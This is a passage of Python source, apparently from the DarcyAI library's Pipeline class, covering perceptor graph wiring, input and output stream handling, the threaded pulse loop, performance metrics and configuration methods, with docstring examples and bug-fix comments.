    self.__input_data_history_len = input_data_history_len
    self.__input_data_history = OrderedDict()
    self.__pom_history_len = pom_history_len
    self.__pom_history = OrderedDict()
    self.__metrics_history = OrderedDict()
    self.__metrics_history_len = metrics_history_len
    self.__average_pipeline_cycle_execution = 0
    self.__average_perceptor_execution = {}
    self.__perceptors_execution_time = {}
    self.__perceptor_error_handler_callback = perceptor_error_handler_callback
    self.__output_stream_error_handler_callback = output_stream_error_handler_callback
    self.__input_stream_error_handler_callback = input_stream_error_handler_callback
    self.__perceptors = {}
    self.__output_streams = {}
    self.__processing_engine = ProcessingEngine(self.__num_of_edge_tpus)
    self.__thread_pool = ThreadPool(10)
    self.__pom = PerceptionObjectModel()
    self.__pulse_number = 0
    self.__perceptor_config_registry = {}
    self.__perceptor_config_schema = {}
    self.__output_config_registry = {}
    self.__output_config_schema = {}
    self.__logger = setup_custom_logger(__name__)
    self.__running = False
    if universal_rest_api:
        threading.Thread(target=self.__start_api_server).start()
    # stop the pipeline cleanly on fatal signals
    signals = [SIGABRT, SIGILL, SIGINT, SIGSEGV, SIGTERM, SIGQUIT]
    for sig in signals:
        signal(sig, self.stop)
def num_of_edge_tpus(self) -> int:
    """
    Gets the number of Edge TPUs in the pipeline.

    # Returns
    int: The number of Edge TPUs in the pipeline.

    # Examples
    ```python
    >>> from darcyai.input.camera_stream import CameraStream
    >>> from darcyai.pipeline import Pipeline

    >>> camera = CameraStream(video_device="/dev/video0")
    >>> pipeline = Pipeline(input_stream=camera)
    >>> pipeline.num_of_edge_tpus()
    ```
    """
    return self.__num_of_edge_tpus
def add_perceptor(self,
                  name: str,
                  perceptor: Perceptor,
                  input_callback: Callable[[StreamData,
                                            PerceptionObjectModel,
                                            ConfigRegistry],
                                           Any] = None,
                  output_callback: Callable[[Any,
                                             PerceptionObjectModel,
                                             ConfigRegistry],
                                            Any] = None,
                  parent: str = None,
                  multi: bool = False,
                  accelerator_idx: Union[int, None] = None,
                  default_config: Dict[str, Any] = None) -> None:
    """
    Adds a new Perceptor to the pipeline.

    # Arguments
    name (str): The name of the Perceptor (must be a valid variable name).
    perceptor (Perceptor): The Perceptor to be added.
    input_callback (Callable[[StreamData, PerceptionObjectModel, ConfigRegistry], Any]): The
        callback function to be called when the Perceptor receives input data.
        Defaults to `None`.
    output_callback (Callable[[Any, PerceptionObjectModel, ConfigRegistry], Any]): The
        callback function to be called when the Perceptor produces output data.
        Defaults to `None`.
    parent (str): The name of the parent Perceptor. Defaults to `None`
        (attached to the pipeline root).
    multi (bool): Whether or not to run the perceptor for each item in input data.
        Defaults to `False`.
    accelerator_idx (int): The index of the Edge TPU to be used by the Perceptor.
        Defaults to `None`.
    default_config (Dict[str, Any]): The default configuration for the Perceptor.
        Defaults to `None`.

    # Examples
    ```python
    >>> from darcyai.input.camera_stream import CameraStream
    >>> from darcyai.pipeline import Pipeline

    >>> camera = CameraStream(video_device="/dev/video0")
    >>> pipeline = Pipeline(input_stream=camera)
    >>> pipeline.add_perceptor(name="perceptor",
    ...                        perceptor=MyPerceptor(),
    ...                        input_callback=None,
    ...                        output_callback=None,
    ...                        parent="input_stream",
    ...                        multi=True,
    ...                        accelerator_idx=0,
    ...                        default_config={"key": "value"})
    ```
    """
    self.__logger.debug("Adding Perceptor '%s' to Pipeline", name)
    self.__validate_perceptor(
        name=name,
        perceptor=perceptor,
        input_callback=input_callback,
        output_callback=output_callback,
        accelerator_idx=accelerator_idx,
        default_config=default_config)
    if parent is not None and parent not in self.__perceptors:
        raise ValueError(
            f"perceptor with name '{parent}' does not exist")
    perceptor_node = PerceptorNode(
        name,
        perceptor,
        input_callback,
        output_callback,
        multi,
        accelerator_idx)
    self.__perceptors[name] = perceptor_node
    # wire the new node under its parent, if one was given
    if parent is not None:
        self.__perceptors[parent].add_child_perceptor(name)
    self.__create_config_registry_for_perceptor(
        name, perceptor, default_config)
def add_perceptor_before(self,
                         name_to_insert_before: str,
                         name: str,
                         perceptor: Perceptor,
                         input_callback: Callable[[StreamData,
                                                   PerceptionObjectModel,
                                                   ConfigRegistry],
                                                  Any] = None,
                         output_callback: Callable[[Any,
                                                    PerceptionObjectModel,
                                                    ConfigRegistry],
                                                   Any] = None,
                         multi: bool = False,
                         accelerator_idx: Union[int, None] = None,
                         default_config: dict = None) -> None:
    """
    Adds a new Perceptor to the pipeline, inserted before an existing one.

    # Arguments
    name_to_insert_before (str): The name of the Perceptor to insert the new Perceptor
        before.
    name (str): The name of the Perceptor.
    perceptor (Perceptor): The Perceptor to be added.
    input_callback (Callable[[StreamData, PerceptionObjectModel, ConfigRegistry], Any]): The
        callback function to be called when the Perceptor receives input data.
        Defaults to `None`.
    output_callback (Callable[[Any, PerceptionObjectModel, ConfigRegistry], Any]): The
        callback function to be called when the Perceptor produces output data.
        Defaults to `None`.
    multi (bool): Whether or not to run the perceptor for each item in input data.
        Defaults to `False`.
    accelerator_idx (int): The index of the Edge TPU to be used by the Perceptor.
        Defaults to `None`.
    default_config (dict): The default configuration for the Perceptor.
        Defaults to `None`.

    # Examples
    ```python
    >>> from darcyai.input.camera_stream import CameraStream
    >>> from darcyai.pipeline import Pipeline

    >>> camera = CameraStream(video_device="/dev/video0")
    >>> pipeline = Pipeline(input_stream=camera)
    >>> pipeline.add_perceptor_before(name="perceptor",
    ...                               name_to_insert_before="child_input_stream",
    ...                               perceptor=MyPerceptor(),
    ...                               input_callback=None,
    ...                               output_callback=None,
    ...                               multi=True,
    ...                               accelerator_idx=0,
    ...                               default_config={"key": "value"})
    ```
    """
    self.__logger.debug("Adding Perceptor '%s' to Pipeline", name)
    self.__validate_perceptor(
        name=name,
        perceptor=perceptor,
        input_callback=input_callback,
        output_callback=output_callback,
        accelerator_idx=accelerator_idx,
        default_config=default_config)
    validate_not_none(
        name_to_insert_before,
        "name_to_insert_before is required")
    validate_type(
        name_to_insert_before,
        str,
        "name_to_insert_before must be a string")
    validate(
        name_to_insert_before in self.__perceptors,
        f"perceptor with name '{name_to_insert_before}' does not exist")
    validate(name_to_insert_before != name,
             "name_to_insert_before cannot be the same as name")
    perceptor_node = PerceptorNode(
        name,
        perceptor,
        input_callback,
        output_callback,
        multi,
        accelerator_idx)
    self.__perceptors[name] = perceptor_node
    # splice the new node between the target node and all of its parents
    parents = self.__get_perceptor_parents(name_to_insert_before)
    for parent in parents:
        self.__perceptors[parent].add_child_perceptor(name)
        self.__perceptors[parent].remove_child_perceptor(
            name_to_insert_before)
    self.__perceptors[name].add_child_perceptor(name_to_insert_before)
    self.__create_config_registry_for_perceptor(
        name, perceptor, default_config)
def add_perceptor_after(self,
                        name_to_insert_after: str,
                        name: str,
                        perceptor: Perceptor,
                        input_callback: Callable[[StreamData,
                                                  PerceptionObjectModel,
                                                  ConfigRegistry],
                                                 Any] = None,
                        output_callback: Callable[[Any,
                                                   PerceptionObjectModel,
                                                   ConfigRegistry],
                                                  Any] = None,
                        multi: bool = False,
                        accelerator_idx: Union[int, None] = None,
                        default_config: dict = None) -> None:
    """
    Adds a new Perceptor to the pipeline, inserted after an existing one.

    Thin wrapper around `add_perceptor` with `parent=name_to_insert_after`.

    # Arguments
    name_to_insert_after (str): The name of the Perceptor to insert the new Perceptor
        after.
    name (str): The name of the Perceptor.
    perceptor (Perceptor): The Perceptor to be added.
    input_callback (Callable[[StreamData, PerceptionObjectModel, ConfigRegistry], Any]): The
        callback function to be called when the Perceptor receives input data.
        Defaults to `None`.
    output_callback (Callable[[Any, PerceptionObjectModel, ConfigRegistry], Any]): The
        callback function to be called when the Perceptor produces output data.
        Defaults to `None`.
    multi (bool): Whether or not to run the perceptor for each item in input data.
        Defaults to `False`.
    accelerator_idx (int): The index of the Edge TPU to be used by the Perceptor.
        Defaults to `None`.
    default_config (dict): The default configuration for the Perceptor.
        Defaults to `None`.

    # Examples
    ```python
    >>> from darcyai.input.camera_stream import CameraStream
    >>> from darcyai.pipeline import Pipeline

    >>> camera = CameraStream(video_device="/dev/video0")
    >>> pipeline = Pipeline(input_stream=camera)
    >>> pipeline.add_perceptor_after(name="perceptor",
    ...                              name_to_insert_after="parent_input_stream",
    ...                              perceptor=MyPerceptor(),
    ...                              input_callback=None,
    ...                              output_callback=None,
    ...                              multi=True,
    ...                              accelerator_idx=0,
    ...                              default_config={"key": "value"})
    ```
    """
    self.add_perceptor(
        name=name,
        perceptor=perceptor,
        input_callback=input_callback,
        output_callback=output_callback,
        parent=name_to_insert_after,
        multi=multi,
        accelerator_idx=accelerator_idx,
        default_config=default_config)
def add_parallel_perceptor(self,
                           name_to_insert_in_parallel_with: str,
                           name: str,
                           perceptor: Perceptor,
                           input_callback: Callable[[StreamData,
                                                     PerceptionObjectModel,
                                                     ConfigRegistry],
                                                    Any] = None,
                           output_callback: Callable[[Any,
                                                      PerceptionObjectModel,
                                                      ConfigRegistry],
                                                     Any] = None,
                           multi: bool = False,
                           accelerator_idx: Union[int, None] = None,
                           default_config: dict = None) -> None:
    """
    Adds a new Perceptor to the pipeline, running in parallel with an
    existing one (it is attached to the same parent nodes).

    # Arguments
    name_to_insert_in_parallel_with (str): The name of the Perceptor to insert the
        new Perceptor in parallel with.
    name (str): The name of the Perceptor.
    perceptor (Perceptor): The Perceptor to be added.
    input_callback (Callable[[StreamData, PerceptionObjectModel, ConfigRegistry], Any]): The
        callback function to be called when the Perceptor receives input data.
        Defaults to `None`.
    output_callback (Callable[[Any, PerceptionObjectModel, ConfigRegistry], Any]): The
        callback function to be called when the Perceptor produces output data.
        Defaults to `None`.
    multi (bool): Whether or not to run the perceptor for each item in input data.
        Defaults to `False`.
    accelerator_idx (int): The index of the Edge TPU to be used by the Perceptor.
        Defaults to `None`.
    default_config (dict): The default configuration for the Perceptor.
        Defaults to `None`.

    # Examples
    ```python
    >>> from darcyai.input.camera_stream import CameraStream
    >>> from darcyai.pipeline import Pipeline

    >>> camera = CameraStream(video_device="/dev/video0")
    >>> pipeline = Pipeline(input_stream=camera)
    >>> pipeline.add_parallel_perceptor(name="perceptor",
    ...                                 name_to_insert_in_parallel_with="parallel_input_stream",
    ...                                 perceptor=MyPerceptor(),
    ...                                 input_callback=None,
    ...                                 output_callback=None,
    ...                                 multi=True,
    ...                                 accelerator_idx=0,
    ...                                 default_config={"key": "value"})
    ```
    """
    self.__logger.debug("Adding Perceptor '%s' to Pipeline", name)
    self.__validate_perceptor(
        name=name,
        perceptor=perceptor,
        input_callback=input_callback,
        output_callback=output_callback,
        accelerator_idx=accelerator_idx,
        default_config=default_config)
    validate_not_none(
        name_to_insert_in_parallel_with,
        "name_to_insert_in_parallel_with is required")
    validate_type(name_to_insert_in_parallel_with, str,
                  "name_to_insert_in_parallel_with must be a string")
    # fixed: the concatenated message was missing a space before "does not exist"
    validate(
        name_to_insert_in_parallel_with in self.__perceptors,
        f"perceptor with name '{name_to_insert_in_parallel_with}' " + \
        "does not exist")
    validate(name_to_insert_in_parallel_with != name,
             "name_to_insert_in_parallel_with cannot be the same as name")
    perceptor_node = PerceptorNode(
        name,
        perceptor,
        input_callback,
        output_callback,
        multi,
        accelerator_idx)
    self.__perceptors[name] = perceptor_node
    # attach to the same parents as the sibling so both run in parallel
    parents = self.__get_perceptor_parents(name_to_insert_in_parallel_with)
    for parent in parents:
        self.__perceptors[parent].add_child_perceptor(name)
    self.__create_config_registry_for_perceptor(
        name, perceptor, default_config)
def update_input_stream(self, input_stream: InputStream) -> None:
    """
    Updates the input stream of the pipeline.

    # Arguments
    input_stream (InputStream): The input stream to be used.

    # Raises
    RuntimeError: If the pipeline is already running.

    # Examples
    ```python
    >>> from darcyai.input.camera_stream import CameraStream
    >>> from darcyai.pipeline import Pipeline

    >>> camera = CameraStream(video_device="/dev/video0")
    >>> pipeline = Pipeline(input_stream=camera)
    >>> pipeline.update_input_stream(camera)
    ```
    """
    self.__logger.debug("Adding Input Stream of type '%s' to Pipeline",
                        input_stream.__class__.__name__)
    validate_not_none(input_stream, "input_stream is required")
    # accept the same stream types as __init__ (previously this rejected
    # an InputMultiStream that the constructor accepts)
    validate_type(input_stream, (InputStream, InputMultiStream),
                  "input_stream must be an InputStream")
    if self.__running:
        raise RuntimeError("Pipeline is already running")
    self.__input_stream = input_stream
def add_output_stream(self,
                      name: str,
                      callback: Callable[[PerceptionObjectModel,
                                          StreamData],
                                         Any],
                      output_stream: OutputStream,
                      default_config: dict = None) -> None:
    """
    Registers an OutputStream with the pipeline.

    # Arguments
    name (str): Unique identifier for the output stream (must be a valid
        Python identifier and not clash with a perceptor name).
    callback (Callable[[PerceptionObjectModel, StreamData], Any]): Called each
        pulse with the POM and the raw input; its return value is what the
        output stream writes.
    output_stream (OutputStream): The stream instance to register.
    default_config (dict): Initial configuration values for the stream.
        Defaults to `None`.

    # Examples
    ```python
    >>> from darcyai.input.camera_stream import CameraStream
    >>> from darcyai.pipeline import Pipeline

    >>> camera = CameraStream(video_device="/dev/video0")
    >>> pipeline = Pipeline(input_stream=camera)
    >>> pipeline.add_output_stream(name="output_stream",
    ...                            callback=lambda pom, data: data,
    ...                            output_stream=MyOutputStream(),
    ...                            default_config={"key": "value"})
    ```
    """
    self.__logger.debug("Adding OutputStream '%s' to Pipeline", name)

    # Name must be a fresh, valid identifier across both namespaces.
    validate_not_none(name, "name is required")
    validate_type(name, str, "name must be a string")
    validate(name.isidentifier(), "name must be a valid identifier")
    validate(
        name not in self.__output_streams,
        f"output stream with name '{name}' already exists")
    validate(name not in self.__perceptors, "name must be unique")

    # Callback and stream instance are both mandatory.
    validate_not_none(callback, "callback is required")
    validate(callable(callback), "callback must be a function")
    validate_not_none(output_stream, "output_stream is required")
    validate_type(
        output_stream,
        OutputStream,
        "output_stream must be an instance of OutputStream")

    self.__output_streams[name] = {
        "callback": callback,
        "stream": output_stream,
    }
    self.__create_config_registry_for_output_stream(
        name, output_stream, default_config)
def remove_output_stream(self, name: str) -> None:
    """
    Unregisters an OutputStream from the pipeline.

    # Arguments
    name (str): The name the output stream was registered under.

    # Raises
    ValueError: If no output stream with that name exists.

    # Examples
    ```python
    >>> from darcyai.input.camera_stream import CameraStream
    >>> from darcyai.pipeline import Pipeline

    >>> camera = CameraStream(video_device="/dev/video0")
    >>> pipeline = Pipeline(input_stream=camera)
    >>> pipeline.add_output_stream(name="output_stream",
    ...                            callback=lambda pom, data: data,
    ...                            output_stream=MyOutputStream())
    >>> pipeline.remove_output_stream(name="output_stream")
    ```
    """
    self.__logger.debug("Removing OutputStream '%s' from Pipeline", name)
    validate_not_none(name, "name is required")
    validate_type(name, str, "name must be a string")
    if name not in self.__output_streams:
        raise ValueError(
            f"output stream with name '{name}' does not exist")
    self.__output_streams.pop(name)
def stop(self) -> None:
    """
    Stops the pipeline: clears the running flag, stops the input stream,
    and closes every registered output stream.

    # Examples
    ```python
    >>> from darcyai.input.camera_stream import CameraStream
    >>> from darcyai.pipeline import Pipeline

    >>> camera = CameraStream(video_device="/dev/video0")
    >>> pipeline = Pipeline(input_stream=camera)
    >>> pipeline.stop()
    ```
    """
    self.__logger.debug("Stopping Pipeline")
    self.__running = False
    self.__input_stream.stop()
    for entry in self.__output_streams.values():
        entry["stream"].close()
def run(self) -> None:
    """
    Runs the pipeline loop until the input stream is exhausted.

    Each iteration ("pulse") pulls one item from the input stream, runs the
    perceptors level by level on the thread pool, records timing metrics,
    stores the POM/input history, and fans the POM out to the output streams.

    # Raises
    Exception: Re-raises input-stream, perceptor, or output-stream errors
        when the corresponding error-handler callback is not set.

    # Examples
    ```python
    >>> from darcyai.input.camera_stream import CameraStream
    >>> from darcyai.pipeline import Pipeline

    >>> camera = CameraStream(video_device="/dev/video0")
    >>> pipeline = Pipeline(input_stream=camera)
    >>> pipeline.run()
    ```
    """
    self.__logger.debug("Running Pipeline")
    self.__running = True
    stream = self.__input_stream.stream()
    validate_type(stream, Iterable, "input stream is not Iterable")
    perceptors_order = self.__get_perceptors_order()
    try:
        while True:
            start = time.perf_counter()
            try:
                input_data = next(stream, sentinel.END_OF_ITERATION)
                if input_data is sentinel.END_OF_ITERATION:
                    return
            except Exception as e:
                self.__logger.exception("Error running Pipeline")
                if self.__input_stream_error_handler_callback is not None:
                    self.__input_stream_error_handler_callback(e)
                    # BUG FIX: previously execution fell through after the
                    # handler, reusing the *previous* pulse's input_data
                    # (or raising NameError on the first pulse). Skip to
                    # the next pulse instead.
                    continue
                raise e

            self.__pulse_number += 1

            # Store input data history (bounded FIFO on an OrderedDict).
            self.__input_data_history[self.__pulse_number] = input_data
            if len(self.__input_data_history) > self.__input_data_history_len:
                self.__input_data_history.popitem(last=False)

            pom = PerceptionObjectModel()

            # Run perceptors one topological level at a time; perceptors
            # within a level run in parallel on the thread pool, and their
            # results are written onto the POM by the completion callback.
            for perceptors in perceptors_order:
                async_calls = [
                    self.__thread_pool.apply_async(
                        self.__run_perceptor,
                        args=(
                            perceptor_name,
                            input_data,
                            pom),
                        callback=self.__set_perceptor_result(perceptor_name, pom)) \
                    for perceptor_name in perceptors]
                # .get() blocks until every perceptor in the level is done
                # and re-raises any worker exception.
                _ = [async_call.get() for async_call in async_calls]

            pulse_execution_time = time.perf_counter() - start

            # Incremental running average of the pulse duration.
            if self.__pulse_number == 1:
                self.__average_pipeline_cycle_execution = pulse_execution_time
            else:
                self.__average_pipeline_cycle_execution = (
                    self.__average_pipeline_cycle_execution *
                    (self.__pulse_number - 1) +
                    pulse_execution_time) / self.__pulse_number

            self.__metrics_history[self.__pulse_number] = {
                "pulse_execution_time": pulse_execution_time,
                # BUG FIX: snapshot the per-perceptor timings. __run_perceptor
                # mutates self.__perceptors_execution_time in place every
                # pulse, so storing the dict itself made every history entry
                # alias the most recent pulse's numbers.
                "perceptors": dict(self.__perceptors_execution_time),
            }
            if len(self.__metrics_history) > self.__metrics_history_len:
                self.__metrics_history.popitem(last=False)

            # Publish the POM and keep a bounded history of it.
            pom.set_input_data(input_data)
            pom.set_pulse_number(self.__pulse_number)
            self.__pom = pom
            self.__pom_history[self.__pulse_number] = self.__pom
            if len(self.__pom_history) > self.__pom_history_len:
                self.__pom_history.popitem(last=False)

            if self.__perception_completion_callback is not None:
                self.__perception_completion_callback(pom)

            # Fan the completed POM out to every output stream in parallel.
            if len(self.__output_streams) > 0:
                async_calls = [
                    self.__thread_pool.apply_async(
                        self.__run_output_stream,
                        args=[
                            output_stream_name,
                            input_data,
                            pom]) for output_stream_name in self.__output_streams]
                _ = [async_call.get() for async_call in async_calls]

            self.__pom = pom
            if self.__pulse_completion_callback is not None:
                self.__pulse_completion_callback(pom)
    finally:
        self.__running = False
def get_pom(self) -> PerceptionObjectModel:
    """
    Returns the Perception Object Model produced by the most recent pulse.

    # Returns
    PerceptionObjectModel: The latest POM.

    # Examples
    ```python
    >>> from darcyai.input.camera_stream import CameraStream
    >>> from darcyai.pipeline import Pipeline

    >>> camera = CameraStream(video_device="/dev/video0")
    >>> pipeline = Pipeline(input_stream=camera)
    >>> pom = pipeline.get_pom()
    ```
    """
    return self.__pom
def get_current_pulse_number(self) -> int:
    """
    Returns the number of the most recently processed pulse.

    # Returns
    int: The current pulse number (0 before the first pulse).

    # Examples
    ```python
    >>> from darcyai.input.camera_stream import CameraStream
    >>> from darcyai.pipeline import Pipeline

    >>> camera = CameraStream(video_device="/dev/video0")
    >>> pipeline = Pipeline(input_stream=camera)
    >>> pulse_number = pipeline.get_current_pulse_number()
    ```
    """
    return self.__pulse_number
def get_latest_input(self) -> StreamData:
    """
    Returns the input data of the most recent pulse.

    # Returns
    StreamData: The latest input data, or `None` if no pulse has run yet
        (or the entry has been evicted from the bounded history).

    # Examples
    ```python
    >>> from darcyai.input.camera_stream import CameraStream
    >>> from darcyai.pipeline import Pipeline

    >>> camera = CameraStream(video_device="/dev/video0")
    >>> pipeline = Pipeline(input_stream=camera)
    >>> latest_input = pipeline.get_latest_input()
    ```
    """
    # BUG FIX: direct indexing raised KeyError before the first pulse;
    # .get() returns None instead, matching get_historical_input's contract.
    return self.__input_data_history.get(self.__pulse_number)
def get_historical_input(self, pulse_number: int) -> StreamData:
    """
    Looks up the input data recorded for a given pulse.

    # Arguments
    pulse_number (int): The pulse whose input to fetch.

    # Returns
    StreamData: The recorded input data, or `None` if that pulse is not in
        the (bounded) history.

    # Examples
    ```python
    >>> from darcyai.input.camera_stream import CameraStream
    >>> from darcyai.pipeline import Pipeline

    >>> camera = CameraStream(video_device="/dev/video0")
    >>> pipeline = Pipeline(input_stream=camera)
    >>> historical_input = pipeline.get_historical_input(pulse_number=1)
    ```
    """
    return self.__input_data_history.get(pulse_number)
def get_input_history(self) -> Dict[int, StreamData]:
    """
    Returns a shallow copy of the input-data history.

    # Returns
    `Dict[int, StreamData]` - Pulse number mapped to the input recorded for it.

    # Examples
    ```python
    >>> from darcyai.input.camera_stream import CameraStream
    >>> from darcyai.pipeline import Pipeline

    >>> camera = CameraStream(video_device="/dev/video0")
    >>> pipeline = Pipeline(input_stream=camera)
    >>> input_history = pipeline.get_input_history()
    ```
    """
    # Copy so callers cannot mutate the pipeline's bounded history.
    snapshot = self.__input_data_history.copy()
    return snapshot
def get_historical_pom(self, pulse_number: int) -> PerceptionObjectModel:
    """
    Looks up the POM recorded for a given pulse.

    # Arguments
    pulse_number (int): The pulse whose POM to fetch.

    # Returns
    PerceptionObjectModel: The recorded POM, or `None` if that pulse is not
        in the (bounded) history.

    # Examples
    ```python
    >>> from darcyai.input.camera_stream import CameraStream
    >>> from darcyai.pipeline import Pipeline

    >>> camera = CameraStream(video_device="/dev/video0")
    >>> pipeline = Pipeline(input_stream=camera)
    >>> historical_pom = pipeline.get_historical_pom(pulse_number=1)
    ```
    """
    return self.__pom_history.get(pulse_number)
def get_pom_history(self) -> Dict[int, PerceptionObjectModel]:
    """
    Returns a shallow copy of the POM history.

    # Returns
    `Dict[int, PerceptionObjectModel]` - Pulse number mapped to its POM.

    # Examples
    ```python
    >>> from darcyai.input.camera_stream import CameraStream
    >>> from darcyai.pipeline import Pipeline

    >>> camera = CameraStream(video_device="/dev/video0")
    >>> pipeline = Pipeline(input_stream=camera)
    >>> pom_history = pipeline.get_pom_history()
    ```
    """
    # Copy so callers cannot mutate the pipeline's bounded history.
    snapshot = self.__pom_history.copy()
    return snapshot
def run_perceptor(
        self,
        perceptor: Perceptor,
        input_data: Any,
        multi: bool = False) -> Any:
    """
    Runs a Perceptor directly, outside the pipeline loop.

    Loads the perceptor first if it is not loaded yet.

    # Arguments
    perceptor (Perceptor): The perceptor to run.
    input_data (Any): The data to feed it.
    multi (bool): When `True`, runs the perceptor once per item of
        `input_data` and returns the list of results. Defaults to `False`.

    # Returns
    Any: The perceptor's result (a list of results when `multi` is `True`).

    # Examples
    ```python
    >>> from darcyai.input.camera_stream import CameraStream
    >>> from darcyai.pipeline import Pipeline

    >>> camera = CameraStream(video_device="/dev/video0")
    >>> pipeline = Pipeline(input_stream=camera)
    >>> result = pipeline.run_perceptor(perceptor=Perceptor(), input_data=None, multi=True)
    ```
    """
    self.__logger.debug("Running custom Perceptor")
    validate_not_none(perceptor, "perceptor is required")
    validate_type(
        perceptor,
        Perceptor,
        "perceptor must be an instance of Perceptor")
    if not perceptor.is_loaded():
        perceptor.load()
    if not multi:
        return perceptor.run(input_data, None)
    return [perceptor.run(item, None) for item in input_data]
def get_graph(self) -> Any:
    """
    Returns the perceptor dependency graph as an adjacency mapping.

    # Returns
    Any: Perceptor name mapped to the list of its child perceptor names.

    # Examples
    ```python
    >>> from darcyai.input.camera_stream import CameraStream
    >>> from darcyai.pipeline import Pipeline

    >>> camera = CameraStream(video_device="/dev/video0")
    >>> pipeline = Pipeline(input_stream=camera)
    >>> graph = pipeline.get_graph()
    ```
    """
    return {
        name: node.get_child_perceptors()
        for name, node in self.__perceptors.items()
    }
def get_all_performance_metrics(self) -> Dict[str, Any]:
    """
    Returns the pipeline's aggregate performance metrics.

    # Returns
    `Dict[str, Any]` - Keys: `execution_cycles`,
        `average_pipeline_cycle_execution`, `average_perceptor_execution`
        (per-perceptor averages), and `history` (per-pulse metrics).

    # Examples
    ```python
    >>> from darcyai.input.camera_stream import CameraStream
    >>> from darcyai.pipeline import Pipeline

    >>> camera = CameraStream(video_device="/dev/video0")
    >>> pipeline = Pipeline(input_stream=camera)
    >>> metrics = pipeline.get_all_performance_metrics()
    ```
    """
    per_perceptor = {
        perceptor_name: self.__average_perceptor_execution[perceptor_name]
        for perceptor_name in self.__perceptors
    }
    return {
        "execution_cycles": self.__pulse_number,
        "average_pipeline_cycle_execution": self.__average_pipeline_cycle_execution,
        "average_perceptor_execution": per_perceptor,
        "history": self.__metrics_history,
    }
def get_pulse_performance_metrics(
        self, pulse_number: Union[int, None] = None) -> Dict[str, Any]:
    """
    Returns the performance metrics recorded for one pulse.

    # Arguments
    pulse_number (int): The pulse to look up. Defaults to the current pulse
        when `None`.

    # Returns
    `Dict[str, Any]` - The pulse's metrics, or `None` if it is not in the
        (bounded) metrics history.

    # Examples
    ```python
    >>> from darcyai.input.camera_stream import CameraStream
    >>> from darcyai.pipeline import Pipeline

    >>> camera = CameraStream(video_device="/dev/video0")
    >>> pipeline = Pipeline(input_stream=camera)
    >>> metrics = pipeline.get_pulse_performance_metrics(pulse_number=1)
    ```
    """
    if pulse_number is None:
        pulse_number = self.__pulse_number
    return self.__metrics_history.get(pulse_number)
def get_perceptor_performance_metrics(
        self, name: str, pulse_number: Union[int, None] = None) -> Dict[str, Any]:
    """
    Returns the metrics recorded for one perceptor at one pulse.

    # Arguments
    name (str): The perceptor's name.
    pulse_number (int): The pulse to look up. Defaults to the current pulse
        when `None`.

    # Returns
    `Dict[str, Any]` - The perceptor's metrics for that pulse, or `None` if
        the perceptor does not exist or the pulse is not in history.

    # Examples
    ```python
    >>> from darcyai.input.camera_stream import CameraStream
    >>> from darcyai.pipeline import Pipeline

    >>> camera = CameraStream(video_device="/dev/video0")
    >>> pipeline = Pipeline(input_stream=camera)
    >>> metrics = pipeline.get_perceptor_performance_metrics(name="perceptor_name",
    ...                                                      pulse_number=1)
    ```
    """
    if name not in self.__perceptors:
        return None
    if pulse_number is None:
        pulse_number = self.__pulse_number
    pulse_metrics = self.__metrics_history.get(pulse_number)
    if pulse_metrics is None:
        return None
    return pulse_metrics["perceptors"][name]
def set_perceptor_config(
        self,
        perceptor_name: str,
        name: str,
        value: Any) -> None:
    """
    Sets one configuration value on a perceptor.

    # Arguments
    perceptor_name (str): The perceptor's name.
    name (str): The config key.
    value (Any): The new value.

    # Raises
    Exception: If no perceptor with that name exists.

    # Examples
    ```python
    >>> from darcyai.input.camera_stream import CameraStream
    >>> from darcyai.pipeline import Pipeline

    >>> camera = CameraStream(video_device="/dev/video0")
    >>> pipeline = Pipeline(input_stream=camera)
    >>> pipeline.set_perceptor_config(perceptor_name="perceptor_name",
    ...                               name="config_name",
    ...                               value=1)
    ```
    """
    if perceptor_name not in self.__perceptor_config_registry:
        raise Exception(
            f"Perceptor with name '{perceptor_name}' not found")
    self.__validate_and_set_value_for_perceptor_config(
        perceptor_name, name, value)
    self.__perceptors[perceptor_name].set_perceptor_config(name, value)
def get_perceptor_config(
        self, perceptor_name: str) -> Dict[str, Tuple[Any, Config]]:
    """
    Returns the current config values and schema of a perceptor.

    # Arguments
    perceptor_name (str): The perceptor's name.

    # Returns
    `Dict[str, Tuple[Any, Config]]` - Config key mapped to
        `(current value, schema entry)`.

    # Raises
    Exception: If no perceptor with that name exists.

    # Examples
    ```python
    >>> from darcyai.input.camera_stream import CameraStream
    >>> from darcyai.pipeline import Pipeline

    >>> camera = CameraStream(video_device="/dev/video0")
    >>> pipeline = Pipeline(input_stream=camera)
    >>> config = pipeline.get_perceptor_config(perceptor_name="perceptor_name")
    ```
    """
    if perceptor_name not in self.__perceptor_config_registry:
        raise Exception(
            f"Perceptor with name '{perceptor_name}' not found")
    registry = self.__perceptor_config_registry[perceptor_name]
    return {
        config_name: (registry.get(config_name), config_schema)
        for config_name, config_schema in
        self.__perceptor_config_schema[perceptor_name].items()
    }
def set_output_stream_config(
        self,
        name: str,
        config_name: str,
        value: Any) -> None:
    """
    Sets one configuration value on an output stream.

    # Arguments
    name (str): The output stream's name.
    config_name (str): The config key.
    value (Any): The new value.

    # Raises
    Exception: If no output stream with that name exists.
    ValueError: If the value fails schema validation.

    # Examples
    ```python
    >>> from darcyai.input.camera_stream import CameraStream
    >>> from darcyai.pipeline import Pipeline

    >>> camera = CameraStream(video_device="/dev/video0")
    >>> pipeline = Pipeline(input_stream=camera)
    >>> pipeline.set_output_stream_config(name="output_stream_name",
    ...                                   config_name="config_name",
    ...                                   value=1)
    ```
    """
    if name not in self.__output_config_registry:
        raise Exception(f"OutputStream with name '{name}' not found")
    # BUG FIX: the previous code additionally called
    # `self.__output_streams[name].set_perceptor_config(...)`, but that
    # entry is a plain dict ({"callback", "stream"}) and has no such
    # method, so every valid update raised AttributeError. The helper
    # below already propagates the value to the stream via
    # set_config_value, so no extra call is needed.
    self.__validate_and_set_value_for_output_stream_config(
        name, config_name, value)
def get_output_stream_config(
        self, name: str) -> Dict[str, Tuple[Any, Config]]:
    """
    Returns the current config values and schema of an output stream.

    # Arguments
    name (str): The output stream's name.

    # Returns
    `Dict[str, Tuple[Any, Config]]` - Config key mapped to
        `(current value, schema entry)`.

    # Raises
    Exception: If no output stream with that name exists.

    # Examples
    ```python
    >>> from darcyai.input.camera_stream import CameraStream
    >>> from darcyai.pipeline import Pipeline

    >>> camera = CameraStream(video_device="/dev/video0")
    >>> pipeline = Pipeline(input_stream=camera)
    >>> config = pipeline.get_output_stream_config(name="output_stream_name")
    ```
    """
    if name not in self.__output_config_registry:
        raise Exception(f"OutputStream with name '{name}' not found")
    registry = self.__output_config_registry[name]
    return {
        config_name: (registry.get(config_name), config_schema)
        for config_name, config_schema in
